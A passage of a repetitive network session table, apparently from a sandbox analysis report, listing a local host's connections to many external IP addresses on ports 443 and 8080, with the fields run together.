                                                        12969192.168.2.145124877.24.86.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12970192.168.2.1450038163.241.60.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12971192.168.2.14495222.88.243.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12972192.168.2.144463657.181.217.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12973192.168.2.1452190118.245.7.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12974192.168.2.146079052.25.83.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12975192.168.2.1445208196.88.96.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12976192.168.2.144494666.153.152.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12977192.168.2.1448874217.155.71.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12978192.168.2.1437442113.237.213.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12979192.168.2.1456434217.169.205.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12980192.168.2.1460450143.90.61.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12981192.168.2.1441562191.36.159.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12982192.168.2.1435104213.165.209.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12983192.168.2.144411282.39.120.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12984192.168.2.1455184126.40.169.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12985192.168.2.144105620.97.64.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12986192.168.2.145601498.55.208.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12987192.168.2.1433734156.42.108.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12988192.168.2.1459884162.242.78.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12989192.168.2.144336836.15.30.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12990192.168.2.14546662.132.198.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12991192.168.2.1454542197.29.70.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12992192.168.2.1451894135.32.230.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12993192.168.2.145448271.104.137.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12994192.168.2.1456980206.140.26.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12995192.168.2.14596425.214.181.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12996192.168.2.14562522.79.177.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12997192.168.2.1446570155.122.156.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12998192.168.2.1444920168.215.244.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12999192.168.2.143738465.179.95.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13000192.168.2.1451994105.89.0.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13001192.168.2.1442568146.134.173.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13002192.168.2.145989439.43.137.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13003192.168.2.143575868.146.45.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13004192.168.2.1445564153.200.118.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13005192.168.2.1435874156.189.164.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13006192.168.2.143448225.242.177.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13007192.168.2.144483018.96.129.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13008192.168.2.1438470144.49.74.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13009192.168.2.1439320183.113.179.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13010192.168.2.1450372141.117.75.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13011192.168.2.1459788142.161.222.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13012192.168.2.144618031.76.58.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13013192.168.2.1439408122.107.182.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13014192.168.2.144544041.75.182.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13015192.168.2.1434236185.80.232.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13016192.168.2.145222475.83.43.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13017192.168.2.1452176172.0.175.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13018192.168.2.144170284.182.185.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13019192.168.2.143983849.64.117.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13020192.168.2.144298446.243.243.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13021192.168.2.145876850.78.120.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13022192.168.2.1449146161.240.98.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13023192.168.2.143820689.254.105.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13024192.168.2.143972877.76.183.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13025192.168.2.145055457.56.77.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13026192.168.2.1436836132.80.152.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13027192.168.2.1459410110.244.55.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13028192.168.2.144919677.187.161.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13029192.168.2.143859032.73.45.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13030192.168.2.145039263.232.177.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13031192.168.2.144592081.219.180.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13032192.168.2.1434278210.61.202.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13033192.168.2.1448576104.252.30.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13034192.168.2.143897280.193.13.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13035192.168.2.1441834194.214.195.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13036192.168.2.1448922142.200.83.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13037192.168.2.1438420162.153.204.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13038192.168.2.1456706185.93.237.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13039192.168.2.144614476.2.241.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13040192.168.2.14585125.121.195.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13041192.168.2.144468827.234.251.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13042192.168.2.144487275.123.27.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13043192.168.2.1459774141.105.84.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13044192.168.2.143614076.237.210.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13045192.168.2.1436590108.149.131.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13046192.168.2.1435862164.164.85.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13047192.168.2.1456228102.108.110.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13048192.168.2.1444254156.96.56.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13049192.168.2.1460852109.93.20.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13050192.168.2.1432892163.195.128.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13051192.168.2.1450104129.131.70.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13052192.168.2.145032649.93.16.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13053192.168.2.1460242137.7.102.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13054192.168.2.1452006207.53.90.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13055192.168.2.1438708165.115.209.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13056192.168.2.145106227.38.77.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13057192.168.2.144531246.135.4.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13058192.168.2.1444926185.106.141.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13059192.168.2.145704675.78.41.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13060192.168.2.1443040161.171.1.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13061192.168.2.1457290141.130.140.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13062192.168.2.1458938146.140.244.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13063192.168.2.1439660142.209.110.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13064192.168.2.1435888191.129.148.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13065192.168.2.1453692162.26.110.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13066192.168.2.144488099.80.246.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13067192.168.2.1447560128.159.134.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13068192.168.2.1440522118.163.249.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13069192.168.2.1451332193.133.28.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13070192.168.2.143327243.108.170.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13071192.168.2.1445114193.243.4.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13072192.168.2.145007269.57.42.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13073192.168.2.1451264176.109.155.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13074192.168.2.145002899.145.214.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13075192.168.2.1453232135.37.169.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13076192.168.2.144373070.36.80.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13077192.168.2.145623474.87.215.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13078192.168.2.1452808108.105.85.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13079192.168.2.1457688211.166.7.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13080192.168.2.1442686130.122.189.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13081192.168.2.1450784135.223.122.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13082192.168.2.1449760137.233.151.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13083192.168.2.143490065.98.80.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13084192.168.2.144950414.94.142.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13085192.168.2.1449980174.172.67.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13086192.168.2.1438744184.51.190.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13087192.168.2.144590087.148.218.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13088192.168.2.1457922161.233.166.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13089192.168.2.1449724132.140.183.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13090192.168.2.144105250.62.128.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13091192.168.2.1453378216.184.83.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13092192.168.2.144866214.103.243.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13093192.168.2.14491142.196.156.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13094192.168.2.1440418124.213.17.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13095192.168.2.1458294135.84.147.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13096192.168.2.1440362144.58.93.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13097192.168.2.1439206196.196.101.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13098192.168.2.145314673.133.15.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13099192.168.2.1435424146.246.238.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13100192.168.2.144742874.224.148.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13101192.168.2.1448810216.104.255.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13102192.168.2.1449946213.117.47.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13103192.168.2.1449578126.236.24.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13104192.168.2.1439122187.110.186.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13105192.168.2.1454932142.155.183.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13106192.168.2.1441902204.114.246.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13107192.168.2.145869418.178.161.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13108192.168.2.145908831.27.241.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13109192.168.2.1455206160.235.194.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13110192.168.2.1445714149.167.137.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13111192.168.2.1456330134.241.149.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13112192.168.2.145951079.82.186.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13113192.168.2.1445504108.154.234.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13114192.168.2.1449260101.65.90.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13115192.168.2.1446050153.68.116.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13116192.168.2.144370268.188.112.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13117192.168.2.145170074.137.223.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13118192.168.2.145289413.235.117.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13119192.168.2.1454148161.137.92.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13120192.168.2.1453078192.20.166.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13121192.168.2.1454234101.88.27.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13122192.168.2.1442804217.96.229.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13123192.168.2.1451822188.171.118.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13124192.168.2.1435512164.204.201.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13125192.168.2.144163883.182.114.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13126192.168.2.144888898.30.186.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13127192.168.2.144359684.197.19.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13128192.168.2.1435088109.109.120.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13129192.168.2.144307693.142.66.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13130192.168.2.1443554191.55.32.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13131192.168.2.143710857.33.13.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13132192.168.2.145095425.105.90.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13133192.168.2.143793285.20.55.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13134192.168.2.144599270.38.226.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13135192.168.2.144817258.251.109.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13136192.168.2.1456950149.90.238.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13137192.168.2.144284683.228.216.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13138192.168.2.1456620198.28.52.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13139192.168.2.144292467.188.54.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13140192.168.2.1436072101.53.47.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13141192.168.2.1444338219.148.42.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13142192.168.2.145160052.147.106.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13143192.168.2.1443422141.166.251.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13144192.168.2.1438344170.54.187.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13145192.168.2.1451148142.174.96.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13146192.168.2.143290212.222.210.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13147192.168.2.145591659.169.36.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13148192.168.2.144891888.84.234.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13149192.168.2.1444012213.110.39.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13150192.168.2.1457966180.168.115.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13151192.168.2.1434292179.237.31.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13152192.168.2.1435244190.114.97.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13153192.168.2.144233678.27.89.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13154192.168.2.1439226175.247.91.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13155192.168.2.1456620171.159.228.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13156192.168.2.145746899.186.49.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13157192.168.2.1438580161.186.233.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13158192.168.2.1457600132.200.163.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13159192.168.2.143904674.199.247.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13160192.168.2.145198245.246.233.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13161192.168.2.1458932209.72.190.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13162192.168.2.145594850.20.104.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13163192.168.2.1445942129.100.46.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13164192.168.2.143676835.117.39.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13165192.168.2.1454462164.238.217.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13166192.168.2.1447134114.164.8.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13167192.168.2.1456542121.246.119.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13168192.168.2.1451862110.216.248.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13169192.168.2.1433336154.44.162.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13170192.168.2.143822234.150.238.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13171192.168.2.1449174191.90.234.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13172192.168.2.1451688204.144.176.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13173192.168.2.144967020.135.62.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13174192.168.2.145227234.51.249.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13175192.168.2.144914248.62.127.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13176192.168.2.1459374140.81.188.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13177192.168.2.14578725.5.119.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13178192.168.2.144687071.90.243.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13179192.168.2.144791661.154.175.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13180192.168.2.144923443.133.242.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13181192.168.2.1438214200.215.143.209443
